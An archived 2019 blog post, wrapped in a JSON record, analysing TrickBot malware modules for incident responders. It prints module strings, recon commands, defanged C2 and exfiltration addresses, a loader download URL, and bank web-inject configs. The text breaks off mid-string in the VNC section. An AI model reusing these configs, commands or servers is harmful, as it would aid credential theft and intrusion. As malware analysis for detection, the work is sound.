{
	"id": "3303a112-5cc4-4122-9570-bd4f34e44d37",
	"created_at": "2026-04-06T00:17:00.676655Z",
	"updated_at": "2026-04-10T03:23:38.790469Z",
	"deleted_at": null,
	"sha1_hash": "6321d907e9bd2d117363b0075415a26d8f449c97",
	"title": "TRICKBOT ANALYSIS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 482553,
	"plain_text": "TRICKBOT ANALYSIS\r\nBy Mark R\r\nPublished: 2019-05-22 · Archived: 2026-04-05 19:44:54 UTC\r\nTRICKBOT is an info-stealer/banking trojan which is currently under active development and has various\r\nmodules to grab credentials, move laterally, steal data and provide remote access.\r\nI recently spent sometime walking through this so I've compiled a few tools/techniques out there to decode and\r\nanalyse each of the TRICKBOT modules - its super simple and very effective! The idea here is to provide\r\nawareness, help with detections and aid incident response. I'm no reverse engineer but I get enough done to\r\nproduce a few IOCs and some basic understanding of it's functionality to scope response. It's all about that\r\ncontext! 😉\r\nI can see where a lot of the OSINT reports on TRICKBOT are compiled from now. Another post can be made on\r\nthe original infection vector, created persistence, removal and other network related IOCs from PCAP data.\r\nIf you don't already have an active infected host, download the @malware_traffic 2019-04-27 TRICKBOT\r\nSAMPLE 👍👍👍\r\nPython 2.7 + pip + easy_install pycrypt ✔✔✔\r\n@hasherezade TRICKBOT BOTKEY 🔑 creator (exe) (source)\r\n32E1293B4B5B212342C131E11B07B4B501DAFCEBB9B3E6B19CC738D7F4571498\r\n@hasherezade TRICKBOT AES config decoder (source)\r\nFireEye Labs Obfuscated String Solver (FLOSS) - strings analysis. https://github.com/fireeye/flare-floss\r\nCyberChef for extracting URLs/domains/IPs, sorting, filtering, defanging etc..\r\nhttps://gchq.github.io/CyberChef/#recipe=Extract_URLs(false)Defang_URL(true,true,true,'Valid domains\r\nand full URLs')\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 1 of 20\n\nOnce you have those downloaded, its just as easy as follows;\r\nSteps\r\n1️⃣ Run the BOTKEY retrieval on the infected host.\r\n2️⃣ Once you have that, specify and decode.\r\nconfig_decode.py --botkey {KEY} --datafile C:\\Users\\USER\\AppData\\Roaming\\gpuDriver\\Data\\pwgrab64\r\nThis will dump the decypted .dll ready for analysis. Do this for each module. Repeat this step for the config files\r\nin the module named folders.\r\nvia GIPHY\r\n3️⃣ Run through with FLOSS and redirect to an output file if needed floss32.exe\r\nC:\\Users\\USER\\AppData\\Roaming\\gpuDriver\\Data\\MODULE.dll \u003e MODULE.txt\r\nThese are the updated versions I was playing with on my infected host.\r\nTRICKBOT Modules 19052019.\r\nConfiguration Location:\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 2 of 20\n\nC:\\Users\\*\\AppData\\Roaming\\gpuDriver\\Data\\*\r\n( %APPDATA%\\gpuDriver\\Data\\ )\r\nModule SHA256 Hashes\r\nimportDll64.dll 844974A2D3266E1F9BA275520C0E8A5D176DF69A0CCD5135B99FACF798A5D209\r\ninjectDll64.dll 8C5C0D27153F60EF8AEC57DEF2F88E3D5F9A7385B5E8B8177BAB55FA7FAC7B18\r\nmailsearcher64.dll 9CFB441EB5C60AB1C90B58D4878543EE554ADA2CCEEE98D6B867E73490D30FEC\r\nnetworkDll64.dll BA2A255671D33677CAB8D93531EB25C0B1F1AC3E3085B95365A017463662D787\r\nNewBCtestDll64.dll BF38A787AEE5AFDCAB00B95CCDF036BC7F91F07151B4444B54165BB70D649CE5\r\npsfin64.dll 8CD75FA8650EBCF0A6200283E474A081CC0BE57307E54909EE15F4D04621DDE0\r\npwgrab64.dll 1E90A73793017720C9A020069ED1C87879174C19C3B619E5B78DB8220A63E9B7\r\nshareDll64.dll 05EF40F7745DB836DE735AC73D6101406E1D9E58C6B5F5322254EB75B98D236A\r\nsysteminfo64.dll 083CB35A7064AA5589EFC544AC1ED1B04EC0F89F0E60383FCB1B02B63F4117E9\r\nvncDll64.dll DBD534F2B5739F89E99782563062169289F23AA335639A9552173BEDC98BB834\r\nwormDll64.dll D5BB8D94B71D475B5EB9BB4235A428563F4104EA49F11EF02C8A08D2E859FD68\r\nString Analysis\r\nJust to give a rough understanding for each modules output I've dumped interesting strings. Most of the output\r\nseen here matches the OSINT reports I've read. TRICKBOT's core modules at the time of writing;\r\nsysteminfo64\r\nnetworkDll64\r\npsfin64\r\nwormDll64\r\nsharedll64\r\npwgrab64\r\ninjectDll64\r\nimportDll64\r\nvncDll64\r\nnewBCtestDll64\r\nAlso of note: there is the main configuration file at C:\\Users\\*\\AppData\\Roaming\\gpuDriver\\Data\\settings.ini\r\nbut I was unable to decode via the scripts from hasherade's repo - more reversing/unpacking is needed and will\r\nsave that for another post. Using Process Hacker to analyse the hollowed out the SVCHOST process memory you\r\ncan see similar results anyway:\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 3 of 20\n\nI had previously captured a bigger list upon process start up and saved that which provides more connections\r\n(probably downloading the latest config verison?):\r\n0x12f6f50 (14): 5[.]190[.]90[.]5:449\r\n0x1312560 (18): 37[.]255[.]200[.]157:449\r\n0x1312590 (16): 91[.]98[.]159[.]58:449\r\n0x13125c0 (18): 190[.]215[.]52[.]165:449\r\n0x13125f0 (18): 85[.]133[.]183[.]174:449\r\n0x1312620 (16): 2[.]184[.]90[.]173:449\r\n0x1312650 (16): 31[.]47[.]55[.]106:449\r\n0x1312680 (18): 94[.]101[.]182[.]156:449\r\n0x13126b0 (18): 93[.]115[.]146[.]119:449\r\n0x13126e0 (17): 201[.]56[.]193[.]18:449\r\n0x1312710 (18): 177[.]92[.]249[.]187:449\r\n0x1312740 (18): 187[.]61[.]106[.]223:449\r\n0x1312770 (18): 187[.]61[.]107[.]140:449\r\n...\r\nSee bottom for more IOCs.\r\nAlso, analyse Wireshark/PCAP data for the User-Agent it uses when POSTing back data from the infected host.\r\nPOST /ono1/WINDOWS7_W617601.0CE242D310E5CDC6F2CB8132FBD9B404/83/ HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC\r\nHost: 186.159.1.217\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 4 of 20\n\nQuickly quering those C2 addresses, most seem to have a commonality of MikroTik based devices - either that or\r\nShodan is misrepresenting that port. Further digging can be done later on this.\r\nPorts:\r\n 21/tcp MikroTik router ftpd (6.43.2)\r\n 2000/tcp MikroTik bandwidth-test server\r\n 8080/tcp MikroTik http proxy\r\nPorts:\r\n 21/tcp MikroTik router ftpd (6.42.5)\r\n 2000/tcp MikroTik bandwidth-test server\r\n 8080/tcp MikroTik http proxy\r\nPorts:\r\n 2000/tcp MikroTik bandwidth-test server\r\nPorts:\r\n 21/tcp MikroTik router ftpd (6.43.12)\r\n 2000/tcp MikroTik bandwidth-test server\r\n 8080/tcp MikroTik http proxy\r\nPorts:\r\n 21/tcp MikroTik router ftpd (6.40.4)\r\n 2000/tcp MikroTik bandwidth-test server\r\nBack to the string analysis of the TRICKBOT modules...\r\nsysteminfo64\r\nBasic information on the host. Noticed the registry key lookup to gather installed applications aswell as WMI\r\nqueries.\r\nSELECT * FROM Win32_OperatingSystem\r\nSELECT * FROM Win32_Processor\r\nSELECT * FROM Win32_ComputerSystem\r\nSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\r\nu\"SELECT * FROM Win32_OperatingSystem\"\r\nu\"CSDVersion\"\r\nu\"SELECT * FROM Win32_Processor\"\r\nu\"\u003ccpu\u003e%s\u003c/cpu\u003e\\r\\n\"\r\nu\"SELECT * FROM Win32_ComputerSystem\"\r\nu\"\u003cram\u003e%s\u003c/ram\u003e\\r\\n\"\r\nu\"\u003cusers\u003e\\r\\n\"\r\nu\"\u003cuser\u003e%s\u003c/user\u003e\\r\\n\"\r\nu\"\u003c/users\u003e\\r\\n\"\r\nu\"DisplayName\"\r\nu\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\"\r\nu\"\u003cinstalled\u003e\\r\\n\"\r\nu\"DisplayName\"\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 5 of 20\n\nu\"\u003cprogram\u003e%s\u003c/program\u003e\\r\\n\"\r\nu\"\u003c/installed\u003e\\r\\n\"\r\nu\"DisplayName\"\r\nu\"DisplayName\"\r\nu\"\u003cservice\u003e%s\u003c/service\u003e\\r\\n\"\r\nnetworkDll64\r\nGathers system information and network/domain topology - you can see what is being leaked. Seems to be\r\nenumerating or looking for Administrative accounts which is all then reported back to the C2.\r\n***SYSTEMINFO***\r\nROOT\\CIMV2 SELECT * FROM Win32_OperatingSystem\r\nCSName\r\nCaption\r\nCSDVersion\r\nOSArchitecture\r\nProductType\r\nBuildType\r\nWindowsDirectory\r\nSystemDirectory\r\nBootDevice\r\nSerialNumber\r\nInstallDate\r\nLastBootUpTime\r\nRegisteredUser\r\nOrganization\r\nTotalVisibleMemorySize\r\nFreePhysicalMemory\r\nHost Name - %s\r\nOS Name - %s\r\nOS Version - %s\r\nOS Architecture - %s\r\nProduct Type - Workstation\r\nProduct Type - Domain Controller\r\nProduct Type - Server\r\nBuild Type - %s\r\nRegistered Owner - %s\r\nRegistered Organization - %s\r\nSerial Number - %s\r\nInstall Date - %02u/%02u/%04u %02d.%02d.%02d\r\nLast Boot Up Time - %02u/%02u/%04u %02d.%02d.%02d\r\nWindows Directory - %s\r\nSystem Directory - %s\r\nBoot Device - %s\r\nTotal Physical Memory - %d Mb\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 6 of 20\n\nAvailable Physical Memory - %d Mb\r\n ***PROCESS LIST***\r\n{001677D0-FD16-11CE-ABC4-02608C9E7553}\r\n{00020404-0000-0000-C000-000000000046}\r\n{109BA8EC-92F0-11D0-A790-00C04FD8D5A8}\r\ndNSHostName\r\ndescription\r\nsAMAccountName\r\nmail\r\ncomment\r\nE-mail: %s\r\n(\u0026(objectcategory=person)(samaccountname=%s))\r\nAdmin Name: %s\r\nAdmin E-mail: %s\r\n(\u0026(objectcategory=person)(mail=*))\r\n(\u0026(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))\r\nList of domains:\r\nLDAP://%s\r\nAdministrator\r\nAdministrateur\r\nRiarth\r\nAmministratore\r\nAdminisztr\r\nAdministr\r\nrnandi\r\nAdministrators\r\nAdministratorius\r\nHallintomies\r\nAdministrat\r\nAdministraator\r\nAdministrador\r\nnetici\r\n***LOCAL MACHINE DATA***\r\nUser name: %s\r\nComputer name: %s\r\nSite name: %s\r\nDomain shortname: %s\r\nDomain name: %s\r\nForest name: %s\r\nDomain controller: %s\r\nForest trees:\r\n%d %s\r\n/%s/%s/90\r\nContent-Type: multipart/form-data; boundary=%s\r\ntest\r\nPOST\r\n--%s\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 7 of 20\n\nContent-Disposition: form-data; name=\"proclist\"\n--%s\nContent-Disposition: form-data; name=\"sysinfo\"\n--%s--\nc ipconfig /all\n/c net config workstation\n/c net view /all\n/c net view /all /domain\n/c nltest /domain_trusts\n/c nltest /domain_trusts /all_trusts\nDecoded 'dpost' config C:\\Users*\\AppData\\Roaming\\gpuDriver\\Data\\networkDll64_configs\nhxxp[://]75[.]183[.]130[.]158:8082hxxp[://]186[.]10[.]243[.]70:8082hxxp[://]75[.]183[.]130[.]158:8082hxxp[://]186[.]183[.]151[.]194:8082hxxp[://]181[.]129[.]160[.]10:8082hxxp[://]181[.]115[.]156[.]218:80hxxp[://]200[.]21[.]51[.]30:80hxxp[://]36[.]91[.]93[.]114:80hxxp[://]97[.]87[.]127[.]198:80hxxp[://]190[.]152[.]125[.]162:80hxxp[://]185[.]117[.]73[.]140:443hxxp[://]185[.]183[.]97[.]37:443hxxp[://]85[.]209[.]162[.]148:443hxxp[://]192[.]210[.]152[.]190:443hxxp[://]185[.]183[.]96[.]219:443hxxp[://]185[.]244[.]150[.]148:443 psfin64\nPoint-of-Sale 'recon' module. These are high end targets to steal financial details from, think tills, kiosks, payment\nterminals. Pro-actively finding and securing these in your environment could help prevent further damage - patch,\nuse unique local Administrative credentials, segregate (VLAN/FW), disabled ADMIN$ shares etc. You can see the\nkeyword searches via LDAP/AD.\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\nPage 8 of 20\n\n\"%s/%s/90\"\nu\"Content-Type: multipart/form-data; boundary=%s\"\n\"SendReport\"\n\"Report successfully sent\"\n\"Dpost servers unavailable\"\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\nPage 9 of 20\n\nu\"--%s\\r\\nContent-Disposition: form-data; name=\\\"proclist\\\"\\r\\n\\r\\n\"\r\nu\"Empty\\r\\n\"\r\nu\"--%s\\r\\n\"\r\nu\"Content-Disposition: form-data; name=\\\"sysinfo\\\"\\r\\n\\r\\n\"\r\nu\"--%s--\\r\\n\\r\\n\"\r\nDecoded 'dpost' config C:\\Users*\\AppData\\Roaming\\gpuDriver\\Data\\psfin64_configs\r\n\u003cdpost\u003e\r\n\u003chandler\u003ehxxp[://]75[.]183[.]130[.]158:8082\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]186[.]10[.]243[.]70:8082\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]75[.]183[.]130[.]158:8082\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]186[.]183[.]151[.]194:8082\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]181[.]129[.]160[.]10:8082\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]181[.]115[.]156[.]218:80\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]200[.]21[.]51[.]30:80\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]36[.]91[.]93[.]114:80\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]97[.]87[.]127[.]198:80\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]190[.]152[.]125[.]162:80\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]185[.]117[.]73[.]140:443\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]185[.]183[.]97[.]37:443\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]85[.]209[.]162[.]148:443\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]192[.]210[.]152[.]190:443\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]185[.]183[.]96[.]219:443\u003c/handler\u003e\r\n\u003chandler\u003ehxxp[://]185[.]244[.]150[.]148:443\u003c/handler\u003e\r\n\u003c/dpost\u003e\r\nwormDll64\r\nDownloads a .png (.exe) from hxxp://54.38.127[.]23/worming.png the TRICKBOT loader to prep for lateral\r\nmovement. Also, checks to see if the host is in a domain or not by using LDAP queries. Seems to use lateral\r\nmovment via shares T1077 using pysmb library.\r\npysmb is an experimental SMB/CIFS library written in Python. It implements the client-side\r\nSMB/CIFS protocol (SMB1 and SMB2) which allows your Python application to access and transfer\r\nfiles to/from SMB/CIFS shared folders like your Windows file sharing and Samba folders.\r\nhxxp://54.38.127[.]23/worming.png\r\nclnProekto.exe\r\n74E6723E9DC7126D4864DCBC41C6B5DAB7AD2A9F56D0C0F94593BA88BDCA1D58\r\nhttps://urlhaus.abuse.ch/url/198254/\r\nhxxp://54.38.127[.]23/worming.png\r\n{001677D0-FD16-11CE-ABC4-02608C9E7553}\r\n{00020404-0000-0000-C000-000000000046}\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 10 of 20\n\n{109BA8EC-92F0-11D0-A790-00C04FD8D5A8}\r\nname\r\n(objectCategory=computer)\r\ndNSHostName\r\n(\u0026(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))\r\n*****MACHINE IN DOMAIN*****\r\nLDAP://%ls\r\n*****MACHINE IN WORKGROUP*****\r\nSMBs\r\npysmb\r\nSMBr\r\nNT LM 0.12\r\nSMBt\r\nSMBs\r\nSMBs\r\nWindows 7\r\n2008\r\nVista\r\nWindows 5\r\n2003\r\n\\\\%s\\IPC$\r\nDownloads the TRICKBOT loader, transfers over to ADMIN shares and creates persistence via services using a\r\nnaming convention from the list \"ControlInfoService\" etc - needs confirming. Also note the 'WormShare' function\r\nname.\r\nOther OSINT analysis:\r\nThis module appears to be meant to be used in tandem with the worm32Dll module to spread Trickbot\r\nacross local networks and shares via ETERNALBLUE SMB exploit and LDAP queries. Creates a service\r\nwith one of the names from the quoted list.\r\nThe Admin$ shares are used by Trickbot once it has brute forced the local administrator password. A file\r\nshare server has an IPC$ share that Trickbot queries to get a list of all endpoints that connect to it.\r\nhxxp://54.38.127[.]23/radiance.png\r\nescaped.exe\r\n5E2CEFB701B743818728ABEDE5FED4956E3ADB69BF58A56C19F5118C415A93BC\r\ncreate service?\r\nOpen sc %d\r\nStart sc 0x%x\r\nCreate sc 0x%x\r\nhxxp://54.38.127[.]23/radiance.png\r\n%s\\C$\\escaped.exe\r\nControlInfoService\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 11 of 20\n\n%SystemRoot%\\system32\\escaped.exe\n%SystemDrive%\\escaped.exe\n%ADMIN$\\escaped.exe\nWormShare\n%\\IPC$\n%SystemDrive%\\escaped.exe\nWantRelease\n54.38.127.23\nfile.inf\n\"ControlInfoService\"\n\"ControlSystemInfoService\"\n\"ServiceInfoSys\"\n\"TechnoInfoService\"\n\"AdvancedInfoService\"\n\"ServiceInfo\"\n\"InfoService\"\n\"ServiceInfoControl\"\npwgrab64\nGrabs passwords from various spots, seen here querying Chrome/IE password storage. OSINT reports suggest\nRDP (CredEnumerateA API ref), VNC and Putty.\nSoftware\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2\nyesyes\n\nhxxp[://]186[.]159[.]1[.]217:8082hxxp[://]186[.]10[.]243[.]70:8082hxxp[://]75[.]183[.]130[.]158:8082hxxp[://]186[.]183[.]151[.]194:8082hxxp[://]181[.]129[.]160[.]10:8082hxxp[://]181[.]57[.]97[.]138:80hxxp[://]200[.]21[.]51[.]30:80hxxp[://]191[.]103[.]252[.]29:80hxxp[://]200[.]35[.]47[.]199:80hxxp[://]190[.]152[.]125[.]162:80hxxp[://]79[.]137[.]119[.]209:443hxxp[://]216[.]189[.]145[.]231:443hxxp[://]194[.]5[.]250[.]130:443hxxp[://]192[.]210[.]152[.]190:443hxxp[://]195[.]123[.]240[.]31:443hxxp[://]89[.]46[.]223[.]252:443 injectDll64\nUsed for injecting into banking websites to steal credentials.\nNotice how it weakens Chrome Browser via\nSoftware\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls\nDisables enforcing Certificate Transparency requirements to the listed URLs. This policy allows\ncertificates for the hostnames in the specified URLs to not be disclosed via Certificate Transparency.\nThis allows certificates that would otherwise be untrusted, because they were not properly publicly\ndisclosed, to continue to be used, but makes it harder to detect misissued certificates for those hosts.\nCertificateTransparencyEnforcementDisabledForUrls\nYou can see this is the main module and purpose of TRICKBOT (steal credentials/data) so this is made up of more\nconfiguration files then any other module.\n1. DINJ config is used for ATTACK 1 - Web Injects - Server Side Injections. A web injection technique\nwhich inserts (injects) additional client-side code (e.g. HTML, JavaScript) in the rendered targeted web\npage.\n2. SINJ config is used for ATTACK 2 - Web Injects - Web Fakes. The user is redirected to a similiar\nlooking site hosted on the attackers infrastructure.\n3. DPOST - Data exfiltration IPs.\nref: https://www.cisecurity.org/white-papers/security-primer-trickbot/ 👏\nyes https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\nPage 13 of 20\n\nascii,81,-,x,Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls\nascii,81,-,x,Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls\nascii,81,-,x,Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls\nDecoded configs\nC:\\Users*\\AppData\\Roaming\\gpuDriver\\Data\\injectDll64_configs\\dpost\nhxxp[://]186[.]159[.]1[.]217:8082hxxp[://]186[.]10[.]243[.]70:8082hxxp[://]75[.]183[.]130[.]158:8082hxxp[://]186[.]183[.]151[.]194:8082hxxp[://]181[.]129[.]160[.]10:8082hxxp[://]181[.]57[.]97[.]138:80hxxp[://]200[.]21[.]51[.]30:80hxxp[://]191[.]103[.]252[.]29:80hxxp[://]200[.]35[.]47[.]199:80hxxp[://]190[.]152[.]125[.]162:80hxxp[://]79[.]137[.]119[.]209:443hxxp[://]216[.]189[.]145[.]231:443hxxp[://]194[.]5[.]250[.]130:443hxxp[://]192[.]210[.]152[.]190:443hxxp[://]195[.]123[.]240[.]31:443hxxp[://]89[.]46[.]223[.]252:443 C:\\Users*\\AppData\\Roaming\\gpuDriver\\Data\\injectDll64_configs\\sinj\nsnippet\nhxxps[://]www[.]rbsdigital[.]com*hxxps[://]www[.]rbsdigital[.]com/default[.]aspx*cksaynvgcustplhbkjzrdfxaqiom[.]net198.46.190.28:443hxxps[://]www[.]nwolb[.]com* https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\nPage 14 of 20\n\n\u003csm\u003ehxxps[://]www[.]nwolb[.]com/default[.]aspx*\u003c/sm\u003e\r\n\u003cnh\u003ecqsawlqdxvfyrcbostmkjeuagpzi[.]net\u003c/nh\u003e\r\n\u003curl404\u003e\u003c/url404\u003e\r\n\u003csrv\u003e198.46.190.28:443\u003c/srv\u003e\r\n\u003c/sinj\u003e\r\n\u003csinj\u003e\r\n\u003cmm\u003ehxxps[://]retail[.]santander[.]co[.]uk*\u003c/mm\u003e\r\n\u003csm\u003ehxxps[://]retail[.]santander[.]co[.]uk/LOGSUK_NS_ENS/BtoChannelDriver[.]ssobto*\u003c/sm\u003e\r\n\u003cnh\u003eodsakrjtsmyalzxfdpvbgqieowch[.]com\u003c/nh\u003e\r\n\u003curl404\u003e\u003c/url404\u003e\r\n\u003csrv\u003e198.46.190.28:443\u003c/srv\u003e\r\n\u003c/sinj\u003e\r\n\u003csinj\u003e\r\n...\r\n...\r\n...\r\n...\r\nC:\\Users*\\AppData\\Roaming\\gpuDriver\\Data\\injectDll64_configs\\dinj\r\nsnippet\r\n\u003cigroup\u003e\r\n\u003cdinj\u003e\r\n\u003clm\u003e*.com/SPF/Login/Auth[.]aspx*\u003c/lm\u003e\r\n\u003chl\u003ehxxp[://]185[.]202[.]174[.]13/response[.]php\u003c/hl\u003e\r\n\u003cpri\u003e100\u003c/pri\u003e\r\n\u003csq\u003e2\u003c/sq\u003e\r\n\u003cignore_mask\u003e*.gif*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003e*.jpg*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003e*.png*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003e*.js*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003e*.css*\u003c/ignore_mask\u003e\r\n\u003crequire_header\u003e*text/html*\u003c/require_header\u003e\r\n\u003c/dinj\u003e\r\n\u003cdinj\u003e\r\n\u003clm\u003e*.com/SPF/Login/favicon[.]ico?*\u003c/lm\u003e\r\n\u003chl\u003ehxxp[://]185[.]202[.]174[.]13/response[.]php\u003c/hl\u003e\r\n\u003cpri\u003e100\u003c/pri\u003e\r\n\u003csq\u003e2\u003c/sq\u003e\r\n\u003c/dinj\u003e\r\n\u003cdinj\u003e\r\n\u003clm\u003e*favicon[.]ico=f7caf50483938302d86aa228d161e435*\u003c/lm\u003e\r\n\u003chl\u003ehxxp[://]185[.]202[.]174[.]13/response[.]php\u003c/hl\u003e\r\n\u003cpri\u003e100\u003c/pri\u003e\r\n\u003csq\u003e1\u003c/sq\u003e\r\n\u003c/dinj\u003e\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 15 of 20\n\n\u003c/igroup\u003e\r\n\u003cdinj\u003e\r\n\u003clm\u003e*amazon.*\u003c/lm\u003e\r\n\u003chl\u003ehxxps[://]185[.]202[.]174[.]13:446/response[.]php?s=1527163537124692\u0026id=DeJENQHkNQsIpSv5YWb8\u003c/hl\u003e\r\n\u003cpri\u003e100\u003c/pri\u003e\r\n\u003csq\u003e2\u003c/sq\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]co[.]uk/ap/signin\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]co[.]uk/*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]co[.]uk/gp/yourstore/home*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]sellercentral[.]amazon[.]com/ap/signin*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]sellercentral[.]amazon[.]com/gp/notifications/notification-widget-internals[.]html*\u003c/igno\r\n\u003cignore_mask\u003e*popokai[.]com*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003e*.js*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]de/ap/signin\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]ca/ap/signin\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]de/gp/yourstore/home*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]ca/gp/yourstore/home*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]ca/*\u003c/ignore_mask\u003e\r\n\u003cignore_mask\u003ehxxps[://]www[.]amazon[.]de/*\u003c/ignore_mask\u003e\r\n\u003crequire_header\u003e*text/html*\u003c/require_header\u003e\r\n\u003c/dinj\u003e\r\n\u003cdinj\u003e\r\n\u003clm\u003ehxxps[://]www[.]amazon[.]co[.]uk/ap/signin\u003c/lm\u003e\r\n\u003chl\u003ehxxps[://]185[.]202[.]174[.]13:446/response[.]php?s=1527163537124692\u0026id=sL5FRia9p0kAxzAm7uXQ\u003c/hl\u003e\r\n\u003cpri\u003e100\u003c/pri\u003e\r\n\u003csq\u003e2\u003c/sq\u003e\r\n\u003cignore_mask\u003e*popokai[.]com*\u003c/ignore_mask\u003e\r\n\u003c/dinj\u003e\r\n...\r\n...\r\n...\r\ndinj and sinj are made up of a dozen more banking websites and shopping sites such as Amazon.\r\nimportDll64\r\nBrowser artefact grabber, form-data, cookies, history. Profiles the installed browser/s via an html/jscript\r\nhttps://gist.github.com/sneakymonk3y/4c372ec9b6b90e445c81de7d9ecaffd9\r\n!!\"\"##$$%%\u0026\u0026''(())**++,,--..//00112233445566778899SQLite format 3\r\nSQLITE_\r\n2017-02-13 16:02:40 ada05cfa86ad7f5645450ac7a2a21c9aa6e57d2c\r\nLooking for %s\r\n%s not found\r\nBrowser exec is: %s\r\n as\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 16 of 20\n\nconf.name\r\nconf.grabbed\r\nGetting cookies\r\nattempt %d. Cookies not found\r\nGetting html5 local storage\r\nattempt %d. Local Storage not found\r\nGetting browser history\r\nattempt %d. History not found\r\nGetting flash lso files\r\nbasic_string::_M_construct null not valid\r\nInternetExplorer\r\nunsupported OS\r\nSOFTWARE\\Microsoft\\Internet Explorer\\svcVersion\r\nSOFTWARE\\Microsoft\\Internet Explorer\\Version\r\nregistry access\r\nFound version %s\r\nVersion %d is not supported\r\n/internet explorer/iexplore.exe\r\nbasic_string::_M_construct null not valid\r\nSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Cookies\r\nregistry cookies path\r\nHTTP/1.1 200 OK\r\nServer: grabber\r\nIE compatible mode grabbing...\r\nHave a nice day\r\nerror listenning\r\nTrying browser communication... please wait\r\nmagic %d\r\nHiddenDesktop\r\n{URL}\r\nhttp.userAgent\r\nSuccess\r\nCould not gather browser data\r\nCompatible mode grabbing is not finished!\r\n127.0.0.1\r\nappro@openssl.org\r\nhttp://127.0.0.1\r\nhttp://www.phreedom.org/md5)\r\nhttp://bugreports.qt.io/\r\nhttp://www.openssl.org/support/faq.html\r\nhttp://www.w3.org/XML/1998/namespace\r\nhttp://www.w3.org/2000/xmlns/\r\nhttp://gcc.gnu.org/bugs.html):\r\nC:\\temp\\qt-common\r\nC:\\temp\\qt-user\r\nc:\\users\\root\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat\r\nhttps://www.sneakymonkey.net/2019/05/22/trickbot-analysis/\r\nPage 17 of 20\n\nvncDll64\r\nRemote Control - VNC module. Could be similar tooling such as http://vncproxy.sourceforge.net/proxy.html.\r\nOutlook is being referenced - not sure if this is more a screen grabbing module for reading emails/security codes?\r\n185.172.129[.]11\r\nRSDS/\r\nC:\\Users\\MaxMikhaylov\\Documents\\Visual Studio 2010\\MMVNC.PROXY\\VNCSRV\\x64\\Release\\VNCSRV.pdb\r\nvncsrv.dll\r\n\"WinSta0\\\\AlterDesk01\"\r\n\" -new -noframemerging http://www.google.com\"\r\n\"Chrome_WidgetWin\"\r\n\" --allow-no-sandbox-job --no-sandbox --disable-3d-apis --disable-accelerated-layers --disable-accelerated-plugi\r\n\"MozillaWindowClass\"\r\n\" -safe-mode\"\r\n\" taskschd.msc\"\r\n\" /K schtasks.exe 